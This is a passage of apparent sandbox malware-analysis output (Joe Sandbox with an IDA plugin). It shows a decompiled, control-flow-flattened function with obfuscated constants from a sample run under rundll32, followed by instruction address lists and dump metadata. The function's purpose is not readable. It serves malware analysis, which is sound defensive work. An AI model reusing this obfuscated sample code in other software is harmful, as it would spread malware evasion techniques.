				_v316 = _v316 + 0x2fb1;
				_v316 = _v316 ^ 0xdea4c46c;
				_v224 = 0xfe0ac2;
				_v224 = _v224 + 0xfffff1ae;
				_v224 = _v224 ^ 0x9ea75b7a;
				_v224 = _v224 ^ 0x9e5aa70a;
				_v272 = 0x969b46;
				_v272 = _v272 / _t734;
				_t735 = 0x5e;
				_v272 = _v272 / _t735;
				_v272 = _v272 ^ 0xefd30b8f;
				_v272 = _v272 ^ 0xefd30d7c;
				_v376 = 0x150d1;
				_v376 = _v376 + 0xf180;
				_v376 = _v376 ^ 0x94f4a204;
				_v376 = _v376 + 0xffff1e44;
				_v376 = _v376 ^ 0x94f362d9;
				_v156 = 0xee57c3;
				_v156 = _v156 >> 1;
				_v156 = _v156 ^ 0x00740491;
				_v212 = 0xc602fd;
				_v212 = _v212 + 0x6a76;
				_v212 = _v212 + 0x1c99;
				_v212 = _v212 ^ 0x00ce641d;
				_v268 = 0xce4877;
				_v268 = _v268 ^ 0x1d22fca4;
				_v268 = _v268 | 0x3421cf88;
				_v268 = _v268 ^ 0x3de53c3b;
				_v124 = 0x747c03;
				_v124 = _v124 + 0xffffbae7;
				_v124 = _v124 ^ 0x007459dd;
				_v236 = 0x1c09ef;
				_t736 = 0x7d;
				_v236 = _v236 * 0x24;
				_v236 = _v236 >> 5;
				_v236 = _v236 ^ 0x00154586;
				_v248 = 0xce2f;
				_v248 = _v248 / _t736;
				_v248 = _v248 ^ 0x54fb24c5;
				_v248 = _v248 ^ 0x54f69380;
				_v368 = 0xa2f216;
				_v368 = _v368 ^ 0x77671628;
				_v368 = _v368 + 0xffffb776;
				_t737 = 0x12;
				_v368 = _v368 * 0x54;
				_v368 = _v368 ^ 0x4cdde93a;
				_v256 = 0x7ecaf1;
				_v256 = _v256 + 0xffff3fac;
				_v256 = _v256 >> 1;
				_v256 = _v256 ^ 0x003aef01;
				_v352 = 0xabf876;
				_v352 = _v352 >> 0xb;
				_v352 = _v352 + 0xffff46d6;
				_v352 = _v352 + 0x2c0c;
				_v352 = _v352 ^ 0xfff246b3;
				_v360 = 0x97ba77;
				_v360 = _v360 ^ 0x3e0377f3;
				_v360 = _v360 >> 0xd;
				_v360 = _v360 / _t737;
				_v360 = _v360 ^ 0x00060934;
				_v336 = 0x8ce7a6;
				_t738 = 0x2f;
				_v336 = _v336 / _t738;
				_v336 = _v336 + 0xffff2624;
				_v336 = _v336 | 0x278756f7;
				_v336 = _v336 ^ 0x278bbfdd;
				_v344 = 0xbf551b;
				_v344 = _v344 * 0x3a;
				_v344 = _v344 ^ 0x84c4554b;
				_v344 = _v344 << 0xf;
				_v344 = _v344 ^ 0x8ea60236;
				_v200 = 0x4381fe;
				_v200 = _v200 | 0xd1728d79;
				_v200 = _v200 ^ 0xd172d7b5;
				_v304 = 0x80f198;
				_t739 = 0x31;
				_v304 = _v304 * 0x64;
				_v304 = _v304 << 0xe;
				_v304 = _v304 + 0xffff9e99;
				_v304 = _v304 ^ 0x97d19a3f;
				_v312 = 0x373eb5;
				_v312 = _v312 / _t739;
				_v312 = _v312 >> 9;
				_v312 = _v312 ^ 0x9e5751db;
				_v312 = _v312 ^ 0x9e5d4ba0;
				_v188 = 0xb51e1e;
				_t740 = 0x6d;
				_v188 = _v188 * 0x30;
				_v188 = _v188 ^ 0x21f969de;
				_v128 = 0x6dafe5;
				_v128 = _v128 + 0xdb72;
				_v128 = _v128 ^ 0x00632f59;
				_v348 = 0xf775fc;
				_v348 = _v348 * 0x7b;
				_v348 = _v348 | 0xe77e6c6c;
				_v348 = _v348 + 0xffff92b3;
				_v348 = _v348 ^ 0xf7fd41f8;
				_v292 = 0x49707d;
				_v292 = _v292 + 0xffffa330;
				_v292 = _v292 + 0x378d;
				_v292 = _v292 ^ 0x2a616ae7;
				_v292 = _v292 ^ 0x2a2200cf;
				_v148 = 0xe2ca7f;
				_v148 = _v148 + 0x2800;
				_v148 = _v148 ^ 0x00ec4a73;
				_v180 = 0x28ed65;
				_t276 =  &_v180; // 0x28ed65
				_v180 =  *_t276 / _t740;
				_v180 = _v180 ^ 0x0008a356;
				_v340 = 0xb04f06;
				_v340 = _v340 | 0x19ae51aa;
				_v340 = _v340 + 0xffff0ab2;
				_v340 = _v340 >> 7;
				_v340 = _v340 ^ 0x003d7bf7;
				_v252 = 0x779412;
				_t741 = 0x28;
				_v252 = _v252 / _t741;
				_v252 = _v252 | 0x065d8c29;
				_v252 = _v252 ^ 0x0653787d;
				_v140 = 0x2cf99d;
				_v140 = _v140 << 0xf;
				_v140 = _v140 ^ 0x7ccdbf9f;
				_v300 = 0xa5c7e2;
				_v300 = _v300 ^ 0xf64f2b87;
				_v300 = _v300 | 0xd6032566;
				_v300 = _v300 << 7;
				_v300 = _v300 ^ 0x75f4cdbc;
				_v204 = 0xc71fe4;
				_v204 = _v204 ^ 0x39f608ad;
				_v204 = _v204 ^ 0x39346367;
				_v332 = 0x26340b;
				_t742 = 0xc;
				_v332 = _v332 / _t742;
				_v332 = _v332 >> 0xc;
				_v332 = _v332 + 0x4006;
				_v332 = _v332 ^ 0x00056ca9;
				_v244 = 0xb4bdd0;
				_v244 = _v244 ^ 0x9dcc8204;
				_t743 = 0x5c;
				_v244 = _v244 * 0x56;
				_v244 = _v244 ^ 0xe668140d;
				_v228 = 0xb7abf;
				_v228 = _v228 ^ 0x8d46dccd;
				_v228 = _v228 / _t743;
				_v228 = _v228 ^ 0x0183fb21;
				_v132 = 0x744574;
				_t744 = 0x2d;
				_v132 = _v132 * 0x27;
				_v132 = _v132 ^ 0x11b9ba9e;
				_v384 = 0x4471dc;
				_v384 = _v384 ^ 0x8273491f;
				_v384 = _v384 / _t744;
				_v384 = _v384 + 0xffffe0da;
				_v384 = _v384 ^ 0x02e26e3a;
				_v324 = 0x605f40;
				_v324 = _v324 + 0xffffce94;
				_v324 = _v324 + 0xffff95c1;
				_v324 = _v324 >> 6;
				_v324 = _v324 ^ 0x0001f278;
				_v380 = 0xfa4dc1;
				_t745 = 0x17;
				_v380 = _v380 * 0x71;
				_v380 = _v380 ^ 0x12ce666f;
				_v380 = _v380 | 0xc76ff931;
				_v380 = _v380 ^ 0xfff34e85;
				_v172 = 0xf73d33;
				_v172 = _v172 >> 7;
				_v172 = _v172 ^ 0x0001a374;
				_v364 = 0xb38f71;
				_v364 = _v364 + 0x4143;
				_v364 = _v364 ^ 0x53c53aac;
				_v364 = _v364 / _t745;
				_v364 = _v364 ^ 0x03acc109;
				_v260 = 0xa91f99;
				_v260 = _v260 >> 0xa;
				_v260 = _v260 ^ 0xc9224c65;
				_v260 = _v260 ^ 0xc926367a;
				_v284 = 0x5ea8fe;
				_v284 = _v284 * 0x3e;
				_v284 = _v284 | 0x757fbe3f;
				_v284 = _v284 ^ 0x77fedad5;
				_v264 = 0xc1651a;
				_v264 = _v264 / _t745;
				_v264 = _v264 + 0x650c;
				_v264 = _v264 ^ 0x00066731;
				_v372 = 0xd53751;
				_v372 = _v372 >> 0x10;
				_v372 = _v372 * 0x50;
				_v372 = _v372 ^ 0xc5a53504;
				_v372 = _v372 ^ 0xc5a85656;
				_v220 = 0x28743;
				_v220 = _v220 | 0x747e4fe0;
				_v220 = _v220 >> 8;
				_v220 = _v220 ^ 0x0078aec3;
				_v356 = 0x673303;
				_v356 = _v356 + 0xffff3afb;
				_v356 = _v356 >> 2;
				_t746 = 0x76;
				_t842 = 0x6cd454e;
				_v96 = 0x100;
				_t840 = 0xcf5796f;
				_v356 = _v356 * 9;
				_v356 = _v356 ^ 0x00e12344;
				_v232 = 0xe5489f;
				_v232 = _v232 * 0x62;
				_v232 = _v232 ^ 0x422e6763;
				_v232 = _v232 ^ 0x15e3beef;
				_v144 = 0x9d1c0d;
				_v144 = _v144 | 0x5a9db401;
				_v144 = _v144 ^ 0x5a9ceaa6;
				_v328 = 0xaba5b0;
				_v328 = _v328 + 0xfc55;
				_v328 = _v328 * 0x37;
				_v328 = _v328 * 0x78;
				_v328 = _v328 ^ 0x62b938e2;
				_v168 = 0x51360e;
				_v168 = _v168 << 2;
				_v168 = _v168 ^ 0x014a45e2;
				_v176 = 0x11fbeb;
				_v176 = _v176 << 0xa;
				_v176 = _v176 ^ 0x47e89d0f;
				_v216 = 0x8fcc87;
				_v216 = _v216 / _t746;
				_v216 = _v216 ^ 0xd2cd5e41;
				_v216 = _v216 ^ 0xd2c9cc36;
				_v184 = 0x8a666a;
				_v184 = _v184 * 0x6c;
				_v184 = _v184 ^ 0x3a66624b;
				_v288 = 0x12fc4d;
				_v288 = _v288 ^ 0x84b68421;
				_v288 = _v288 * 0x77;
				_v288 = _v288 ^ 0xa87aad10;
				_v296 = 0xb3f337;
				_v296 = _v296 >> 1;
				_v296 = _v296 + 0xffffa2d0;
				_v296 = _v296 + 0xffff98aa;
				_v296 = _v296 ^ 0x0050e375;
				_v160 = 0xa98b94;
				_v160 = _v160 ^ 0x93f8baf3;
				_v160 = _v160 ^ 0x935506dc;
				_v208 = 0xd26eef;
				_v208 = _v208 + 0xffff657d;
				_v208 = _v208 << 5;
				_v208 = _v208 ^ 0x1a3ecca6;
				_v280 = 0xce1cc4;
				_v280 = _v280 << 6;
				_v280 = _v280 << 0x10;
				_v280 = _v280 | 0xb3a7eb9b;
				_v280 = _v280 ^ 0xb3a418cd;
				while(1) {
					L1:
					_t747 = 0xb34e23f;
					while(1) {
						L2:
						while(1) {
							L3:
							_t690 = 0xa0b11f8;
							do {
								while(1) {
									L4:
									_t850 = _t725 - _t690;
									if(_t850 > 0) {
										break;
									}
									if(_t850 == 0) {
										_t700 = E00694624(_v224, _v108, _v232, _v144,  &_v112, _v328, _v120);
										_t847 = _t847 + 0x14;
										__eflags = _t700;
										_t747 = 0xb34e23f;
										_t725 =  ==  ? 0xb34e23f : 0xcc5fcc9;
										goto L2;
									} else {
										if(_t725 == 0x24fa5ba) {
											_push(_v212);
											_push(_v156);
											_t701 = E0069DCF7(_v376, 0x681984, __eflags);
											_push(_v236);
											_push(_v124);
											_t704 = E00689462(_t701, _v368,  &_v116, E0069DCF7(_v268, 0x681814, __eflags), _v256, _v136);
											_t847 = _t847 + 0x24;
											__eflags = _t704 - _v240;
											_t725 =  ==  ? 0xec78b05 : 0xc75135f;
											E0068A8B0(_v352, _t701, _v360);
											E0068A8B0(_v336, _t702, _v344);
											_t840 = 0xcf5796f;
											goto L13;
										} else {
											if(_t725 == 0x505fe8e) {
												_t631 =  &_v208; // 0x39346367
												E0068957D(_v116, _v160,  *_t631, _v272, _v280);
											} else {
												if(_t725 == _t842) {
													_push(_v340);
													_push(_v180);
													_t710 = E0069DCF7(_v148, 0x681854, __eflags);
													_pop(_t763);
													_t844 = _t710;
													_t711 = 0x48;
													_v104 = _t711;
													_t713 = E00681C45(_v120,  &_v104,  &_v76, _v252, _v140, _v300, _v204, _t710, _v332, _v276, _t763, _t711);
													_t847 = _t847 + 0x28;
													__eflags = _t713 - _v164;
													if(_t713 != _v164) {
														_t725 = _t840;
													} else {
														_t834 =  *0x6a3dfc; // 0x0
														E0068ED7E(_v244, _t834, _v228,  &_v68, 0x40);
														_t847 = _t847 + 0xc;
														_t725 = 0x9bcfe4f;
													}
													E0068A8B0(_v132, _t844, _v384);
													goto L13;
												} else {
													if(_t725 == 0x7252bf3) {
														_t725 = 0x24fa5ba;
														continue;
													} else {
														if(_t725 == _t819) {
															_t717 = E0068B144(_v120, _v188, _v308, _v128, _v348, _v292);
															_t847 = _t847 + 0x10;
															__eflags = _t717 - _v152;
															_t725 =  ==  ? _t842 : _t840;
															while(1) {
																L1:
																_t747 = 0xb34e23f;
																L2:
																L3:
																_t690 = 0xa0b11f8;
																goto L4;
															}
														} else {
															_t856 = _t725 - 0x9bcfe4f;
															if(_t725 == 0x9bcfe4f) {
																_push(_v172);
																_push(_v380);
																_t719 = E0069DCF7(_v324, 0x681854, _t856);
																_pop(_t772);
																E0068AA4D(_v364, _t719,  *((intOrPtr*)(_v100 + 4)), _v284, _v196, _v116,  &_v108, _v264, _t772,  *_v100, _v372);
																_t725 =  ==  ? 0xa0b11f8 : _t840;
																E0068A8B0(_v220, _t719, _v356);
																_t847 = _t847 + 0x2c;
																L13:
																_t842 = 0x6cd454e;
																L32:
																_t819 = 0x9b01f0f;
																_t747 = 0xb34e23f;
																_t690 = 0xa0b11f8;
															}
															goto L33;
														}
													}
												}
											}
										}
									}
									L36:
									return _t846;
								}
								__eflags = _t725 - _t747;
								if(_t725 == _t747) {
									_t691 = E00682BD9(_v112);
									_t725 = 0xb500bcf;
									__eflags = _t691;
									_t846 =  !=  ? 1 : _t846;
									goto L32;
								} else {
									__eflags = _t725 - 0xb500bcf;
									if(_t725 == 0xb500bcf) {
										E0069CA69(_v112, _v168, _v176);
										_t725 = 0xcc5fcc9;
										goto L1;
									} else {
										__eflags = _t725 - 0xcc5fcc9;
										if(_t725 == 0xcc5fcc9) {
											E0068A958(_v216, _v108, _v184);
											_t725 = _t840;
											while(1) {
												L1:
												_t747 = 0xb34e23f;
												goto L2;
											}
										} else {
											__eflags = _t725 - _t840;
											if(_t725 == _t840) {
												E0068A958(_v288, _v120, _v296);
												_t725 = 0x505fe8e;
												while(1) {
													L1:
													_t747 = 0xb34e23f;
													goto L2;
												}
											} else {
												__eflags = _t725 - 0xec78b05;
												if(__eflags != 0) {
													goto L33;
												} else {
													_v104 = _v96;
													_t697 = E006892C7(_v200, _v96, _v304, _v312,  &_v120, _v116, _v320);
													_t847 = _t847 + 0x14;
													__eflags = _t697 - _v192;
													_t819 = 0x9b01f0f;
													_t747 = 0xb34e23f;
													_t725 =  ==  ? 0x9b01f0f : 0x505fe8e;
													goto L3;
												}
											}
										}
									}
								}
								goto L36;
								L33:
							} while (_t725 != 0xc75135f);
							goto L36;
						}
					}
				}
			}





















































































































                                                                                                                      0x0068bb84
                                                                                                                      0x0068bb9c
                                                                                                                      0x0068bba3
                                                                                                                      0x0068bba8
                                                                                                                      0x0068bbab
                                                                                                                      0x0068bbac
                                                                                                                      0x0068bbae
                                                                                                                      0x0068bbb3
                                                                                                                      0x0068bbb4
                                                                                                                      0x0068bbc7
                                                                                                                      0x0068bbce
                                                                                                                      0x0068bbd9
                                                                                                                      0x0068bbe4
                                                                                                                      0x0068bbf4
                                                                                                                      0x0068bbfb
                                                                                                                      0x0068bc06
                                                                                                                      0x0068bc0e
                                                                                                                      0x0068bc1b
                                                                                                                      0x0068bc1f
                                                                                                                      0x0068bc27
                                                                                                                      0x0068bc2f
                                                                                                                      0x0068bc3a
                                                                                                                      0x0068bc42
                                                                                                                      0x0068bc49
                                                                                                                      0x0068bc54
                                                                                                                      0x0068bc5c
                                                                                                                      0x0068bc64
                                                                                                                      0x0068bc69
                                                                                                                      0x0068bc71
                                                                                                                      0x0068bc79
                                                                                                                      0x0068bc84
                                                                                                                      0x0068bc8f
                                                                                                                      0x0068bc9a
                                                                                                                      0x0068bca5
                                                                                                                      0x0068bcad
                                                                                                                      0x0068bcc3
                                                                                                                      0x0068bcca
                                                                                                                      0x0068bcd5
                                                                                                                      0x0068bce7
                                                                                                                      0x0068bcec
                                                                                                                      0x0068bcf5
                                                                                                                      0x0068bd00
                                                                                                                      0x0068bd0b
                                                                                                                      0x0068bd16
                                                                                                                      0x0068bd21
                                                                                                                      0x0068bd29
                                                                                                                      0x0068bd36
                                                                                                                      0x0068bd39
                                                                                                                      0x0068bd3d
                                                                                                                      0x0068bd45
                                                                                                                      0x0068bd4d
                                                                                                                      0x0068bd58
                                                                                                                      0x0068bd63
                                                                                                                      0x0068bd6e
                                                                                                                      0x0068bd79
                                                                                                                      0x0068bd8f
                                                                                                                      0x0068bd9d
                                                                                                                      0x0068bda2
                                                                                                                      0x0068bdab
                                                                                                                      0x0068bdb6
                                                                                                                      0x0068bdc1
                                                                                                                      0x0068bdc9
                                                                                                                      0x0068bdd1
                                                                                                                      0x0068bdd9
                                                                                                                      0x0068bde1
                                                                                                                      0x0068bde9
                                                                                                                      0x0068bdf4
                                                                                                                      0x0068bdfb
                                                                                                                      0x0068be06
                                                                                                                      0x0068be11
                                                                                                                      0x0068be1c
                                                                                                                      0x0068be27
                                                                                                                      0x0068be32
                                                                                                                      0x0068be3d
                                                                                                                      0x0068be48
                                                                                                                      0x0068be53
                                                                                                                      0x0068be5e
                                                                                                                      0x0068be69
                                                                                                                      0x0068be74
                                                                                                                      0x0068be7f
                                                                                                                      0x0068be92
                                                                                                                      0x0068be95
                                                                                                                      0x0068be9c
                                                                                                                      0x0068bea4
                                                                                                                      0x0068beaf
                                                                                                                      0x0068bec5
                                                                                                                      0x0068becc
                                                                                                                      0x0068bed7
                                                                                                                      0x0068bee2
                                                                                                                      0x0068beea
                                                                                                                      0x0068bef2
                                                                                                                      0x0068beff
                                                                                                                      0x0068bf02
                                                                                                                      0x0068bf06
                                                                                                                      0x0068bf0e
                                                                                                                      0x0068bf19
                                                                                                                      0x0068bf24
                                                                                                                      0x0068bf2b
                                                                                                                      0x0068bf36
                                                                                                                      0x0068bf3e
                                                                                                                      0x0068bf43
                                                                                                                      0x0068bf4b
                                                                                                                      0x0068bf53
                                                                                                                      0x0068bf5b
                                                                                                                      0x0068bf63
                                                                                                                      0x0068bf6b
                                                                                                                      0x0068bf78
                                                                                                                      0x0068bf7c
                                                                                                                      0x0068bf84
                                                                                                                      0x0068bf90
                                                                                                                      0x0068bf93
                                                                                                                      0x0068bf97
                                                                                                                      0x0068bf9f
                                                                                                                      0x0068bfa7
                                                                                                                      0x0068bfaf
                                                                                                                      0x0068bfbc
                                                                                                                      0x0068bfc0
                                                                                                                      0x0068bfc8
                                                                                                                      0x0068bfcd
                                                                                                                      0x0068bfd5
                                                                                                                      0x0068bfe0
                                                                                                                      0x0068bfeb
                                                                                                                      0x0068bff8
                                                                                                                      0x0068c007
                                                                                                                      0x0068c00a
                                                                                                                      0x0068c00e
                                                                                                                      0x0068c013
                                                                                                                      0x0068c01b
                                                                                                                      0x0068c023
                                                                                                                      0x0068c033
                                                                                                                      0x0068c037
                                                                                                                      0x0068c03c
                                                                                                                      0x0068c044
                                                                                                                      0x0068c04c
                                                                                                                      0x0068c05f
                                                                                                                      0x0068c062
                                                                                                                      0x0068c069
                                                                                                                      0x0068c074
                                                                                                                      0x0068c07f
                                                                                                                      0x0068c08a
                                                                                                                      0x0068c095
                                                                                                                      0x0068c0a2
                                                                                                                      0x0068c0a6
                                                                                                                      0x0068c0ae
                                                                                                                      0x0068c0b6
                                                                                                                      0x0068c0be
                                                                                                                      0x0068c0c6
                                                                                                                      0x0068c0ce
                                                                                                                      0x0068c0d6
                                                                                                                      0x0068c0de
                                                                                                                      0x0068c0e6
                                                                                                                      0x0068c0f1
                                                                                                                      0x0068c0fc
                                                                                                                      0x0068c107
                                                                                                                      0x0068c112
                                                                                                                      0x0068c11d
                                                                                                                      0x0068c124
                                                                                                                      0x0068c12f
                                                                                                                      0x0068c137
                                                                                                                      0x0068c13f
                                                                                                                      0x0068c147
                                                                                                                      0x0068c14c
                                                                                                                      0x0068c154
                                                                                                                      0x0068c166
                                                                                                                      0x0068c16b
                                                                                                                      0x0068c174
                                                                                                                      0x0068c17f
                                                                                                                      0x0068c18a
                                                                                                                      0x0068c195
                                                                                                                      0x0068c19d
                                                                                                                      0x0068c1a8
                                                                                                                      0x0068c1b0
                                                                                                                      0x0068c1b8
                                                                                                                      0x0068c1c0
                                                                                                                      0x0068c1c5
                                                                                                                      0x0068c1cd
                                                                                                                      0x0068c1d8
                                                                                                                      0x0068c1e3
                                                                                                                      0x0068c1ee
                                                                                                                      0x0068c1fa
                                                                                                                      0x0068c1fd
                                                                                                                      0x0068c201
                                                                                                                      0x0068c206
                                                                                                                      0x0068c20e
                                                                                                                      0x0068c216
                                                                                                                      0x0068c223
                                                                                                                      0x0068c238
                                                                                                                      0x0068c23b
                                                                                                                      0x0068c242
                                                                                                                      0x0068c24d
                                                                                                                      0x0068c258
                                                                                                                      0x0068c26e
                                                                                                                      0x0068c275
                                                                                                                      0x0068c280
                                                                                                                      0x0068c293
                                                                                                                      0x0068c296
                                                                                                                      0x0068c29d
                                                                                                                      0x0068c2a8
                                                                                                                      0x0068c2b0
                                                                                                                      0x0068c2c0
                                                                                                                      0x0068c2c4
                                                                                                                      0x0068c2cc
                                                                                                                      0x0068c2d4
                                                                                                                      0x0068c2dc
                                                                                                                      0x0068c2e4
                                                                                                                      0x0068c2ec
                                                                                                                      0x0068c2f1
                                                                                                                      0x0068c2f9
                                                                                                                      0x0068c306
                                                                                                                      0x0068c307
                                                                                                                      0x0068c30b
                                                                                                                      0x0068c313
                                                                                                                      0x0068c31b
                                                                                                                      0x0068c323
                                                                                                                      0x0068c32e
                                                                                                                      0x0068c336
                                                                                                                      0x0068c341
                                                                                                                      0x0068c349
                                                                                                                      0x0068c351
                                                                                                                      0x0068c361
                                                                                                                      0x0068c365
                                                                                                                      0x0068c36d
                                                                                                                      0x0068c378
                                                                                                                      0x0068c380
                                                                                                                      0x0068c38b
                                                                                                                      0x0068c396
                                                                                                                      0x0068c3a3
                                                                                                                      0x0068c3a7
                                                                                                                      0x0068c3af
                                                                                                                      0x0068c3b7
                                                                                                                      0x0068c3cb
                                                                                                                      0x0068c3d2
                                                                                                                      0x0068c3dd
                                                                                                                      0x0068c3e8
                                                                                                                      0x0068c3f0
                                                                                                                      0x0068c3fa
                                                                                                                      0x0068c3fe
                                                                                                                      0x0068c406
                                                                                                                      0x0068c40e
                                                                                                                      0x0068c419
                                                                                                                      0x0068c424
                                                                                                                      0x0068c42c
                                                                                                                      0x0068c437
                                                                                                                      0x0068c43f
                                                                                                                      0x0068c447
                                                                                                                      0x0068c455
                                                                                                                      0x0068c456
                                                                                                                      0x0068c45b
                                                                                                                      0x0068c466
                                                                                                                      0x0068c46b
                                                                                                                      0x0068c46f
                                                                                                                      0x0068c477
                                                                                                                      0x0068c48a
                                                                                                                      0x0068c491
                                                                                                                      0x0068c49c
                                                                                                                      0x0068c4a7
                                                                                                                      0x0068c4b2
                                                                                                                      0x0068c4bd
                                                                                                                      0x0068c4c8
                                                                                                                      0x0068c4d0
                                                                                                                      0x0068c4dd
                                                                                                                      0x0068c4e6
                                                                                                                      0x0068c4ea
                                                                                                                      0x0068c4f2
                                                                                                                      0x0068c4fd
                                                                                                                      0x0068c505
                                                                                                                      0x0068c510
                                                                                                                      0x0068c51b
                                                                                                                      0x0068c523
                                                                                                                      0x0068c52e
                                                                                                                      0x0068c542
                                                                                                                      0x0068c549
                                                                                                                      0x0068c554
                                                                                                                      0x0068c55f
                                                                                                                      0x0068c572
                                                                                                                      0x0068c579
                                                                                                                      0x0068c584
                                                                                                                      0x0068c594
                                                                                                                      0x0068c5a1
                                                                                                                      0x0068c5a5
                                                                                                                      0x0068c5ad
                                                                                                                      0x0068c5b5
                                                                                                                      0x0068c5b9
                                                                                                                      0x0068c5c1
                                                                                                                      0x0068c5c9
                                                                                                                      0x0068c5d1
                                                                                                                      0x0068c5dc
                                                                                                                      0x0068c5e7
                                                                                                                      0x0068c5f2
                                                                                                                      0x0068c5fd
                                                                                                                      0x0068c608
                                                                                                                      0x0068c610
                                                                                                                      0x0068c61b
                                                                                                                      0x0068c623
                                                                                                                      0x0068c628
                                                                                                                      0x0068c62d
                                                                                                                      0x0068c635
                                                                                                                      0x0068c63d
                                                                                                                      0x0068c63d
                                                                                                                      0x0068c63d
                                                                                                                      0x0068c642
                                                                                                                      0x0068c642
                                                                                                                      0x0068c647
                                                                                                                      0x0068c647
                                                                                                                      0x0068c647
                                                                                                                      0x0068c64c
                                                                                                                      0x0068c64c
                                                                                                                      0x0068c64c
                                                                                                                      0x0068c64c
                                                                                                                      0x0068c64e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068c654
                                                                                                                      0x0068c917
                                                                                                                      0x0068c91c
                                                                                                                      0x0068c924
                                                                                                                      0x0068c926
                                                                                                                      0x0068c92b
                                                                                                                      0x00000000
                                                                                                                      0x0068c65a
                                                                                                                      0x0068c660
                                                                                                                      0x0068c83b
                                                                                                                      0x0068c847
                                                                                                                      0x0068c852
                                                                                                                      0x0068c857
                                                                                                                      0x0068c865
                                                                                                                      0x0068c89e
                                                                                                                      0x0068c8a5
                                                                                                                      0x0068c8b4
                                                                                                                      0x0068c8c5
                                                                                                                      0x0068c8c8
                                                                                                                      0x0068c8d8
                                                                                                                      0x0068c8de
                                                                                                                      0x00000000
                                                                                                                      0x0068c666
                                                                                                                      0x0068c66c
                                                                                                                      0x0068ca66
                                                                                                                      0x0068ca7b
                                                                                                                      0x0068c672
                                                                                                                      0x0068c674
                                                                                                                      0x0068c779
                                                                                                                      0x0068c782
                                                                                                                      0x0068c790
                                                                                                                      0x0068c796
                                                                                                                      0x0068c799
                                                                                                                      0x0068c7a2
                                                                                                                      0x0068c7ac
                                                                                                                      0x0068c7e3
                                                                                                                      0x0068c7e8
                                                                                                                      0x0068c7eb
                                                                                                                      0x0068c7f2
                                                                                                                      0x0068c821
                                                                                                                      0x0068c7f4
                                                                                                                      0x0068c805
                                                                                                                      0x0068c812
                                                                                                                      0x0068c817
                                                                                                                      0x0068c81a
                                                                                                                      0x0068c81a
                                                                                                                      0x0068c830
                                                                                                                      0x00000000
                                                                                                                      0x0068c67a
                                                                                                                      0x0068c680
                                                                                                                      0x0068c76f
                                                                                                                      0x00000000
                                                                                                                      0x0068c686
                                                                                                                      0x0068c688
                                                                                                                      0x0068c752
                                                                                                                      0x0068c759
                                                                                                                      0x0068c765
                                                                                                                      0x0068c767
                                                                                                                      0x0068c63d
                                                                                                                      0x0068c63d
                                                                                                                      0x0068c63d
                                                                                                                      0x0068c642
                                                                                                                      0x0068c647
                                                                                                                      0x0068c647
                                                                                                                      0x00000000
                                                                                                                      0x0068c647
                                                                                                                      0x0068c68e
                                                                                                                      0x0068c68e
                                                                                                                      0x0068c694
                                                                                                                      0x0068c69a
                                                                                                                      0x0068c6a6
                                                                                                                      0x0068c6ae
                                                                                                                      0x0068c6b4
                                                                                                                      0x0068c6f8
                                                                                                                      0x0068c71c
                                                                                                                      0x0068c71f
                                                                                                                      0x0068c724
                                                                                                                      0x0068c727
                                                                                                                      0x0068c727
                                                                                                                      0x0068ca3e
                                                                                                                      0x0068ca3e
                                                                                                                      0x0068ca43
                                                                                                                      0x0068ca48
                                                                                                                      0x0068ca48
                                                                                                                      0x00000000
                                                                                                                      0x0068c694
                                                                                                                      0x0068c688
                                                                                                                      0x0068c680
                                                                                                                      0x0068c674
                                                                                                                      0x0068c66c
                                                                                                                      0x0068c660
                                                                                                                      0x0068ca85
                                                                                                                      0x0068ca8f
                                                                                                                      0x0068ca8f
                                                                                                                      0x0068c933
                                                                                                                      0x0068c935
                                                                                                                      0x0068ca2c
                                                                                                                      0x0068ca33
                                                                                                                      0x0068ca39
                                                                                                                      0x0068ca3b
                                                                                                                      0x00000000
                                                                                                                      0x0068c93b
                                                                                                                      0x0068c93b
                                                                                                                      0x0068c941
                                                                                                                      0x0068ca15
                                                                                                                      0x0068ca1b
                                                                                                                      0x00000000
                                                                                                                      0x0068c947
                                                                                                                      0x0068c947
                                                                                                                      0x0068c94d
                                                                                                                      0x0068c9f3
                                                                                                                      0x0068c9f9
                                                                                                                      0x0068c63d
                                                                                                                      0x0068c63d
                                                                                                                      0x0068c63d
                                                                                                                      0x00000000
                                                                                                                      0x0068c63d
                                                                                                                      0x0068c953
                                                                                                                      0x0068c953
                                                                                                                      0x0068c955
                                                                                                                      0x0068c9ce
                                                                                                                      0x0068c9d4
                                                                                                                      0x0068c63d
                                                                                                                      0x0068c63d
                                                                                                                      0x0068c63d
                                                                                                                      0x00000000
                                                                                                                      0x0068c63d
                                                                                                                      0x0068c957
                                                                                                                      0x0068c957
                                                                                                                      0x0068c95d
                                                                                                                      0x00000000
                                                                                                                      0x0068c963
                                                                                                                      0x0068c97c
                                                                                                                      0x0068c995
                                                                                                                      0x0068c99c
                                                                                                                      0x0068c9ab
                                                                                                                      0x0068c9ad
                                                                                                                      0x0068c9b2
                                                                                                                      0x0068c9b7
                                                                                                                      0x00000000
                                                                                                                      0x0068c9b7
                                                                                                                      0x0068c95d
                                                                                                                      0x0068c955
                                                                                                                      0x0068c94d
                                                                                                                      0x0068c941
                                                                                                                      0x00000000
                                                                                                                      0x0068ca4d
                                                                                                                      0x0068ca4d
                                                                                                                      0x00000000
                                                                                                                      0x0068ca59
                                                                                                                      0x0068c647
                                                                                                                      0x0068c642

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ;<=$@_`$CA$D#$Kbf:$PB5$Y/c$cg.B$e($gc49$ll~$sJ$tEt$uP$vj$O~t$iS$ja*
                                                                                                                      • API String ID: 0-258179307
                                                                                                                      • Opcode ID: fea7e653e773f1a230156e891d8d5379a299080a6241029b8904df36aabb68b2
                                                                                                                      • Instruction ID: 9f69955add5b7b4f40cec68279a7dc2c2e745d47e8db22501c7b96983c26d337
                                                                                                                      • Opcode Fuzzy Hash: fea7e653e773f1a230156e891d8d5379a299080a6241029b8904df36aabb68b2
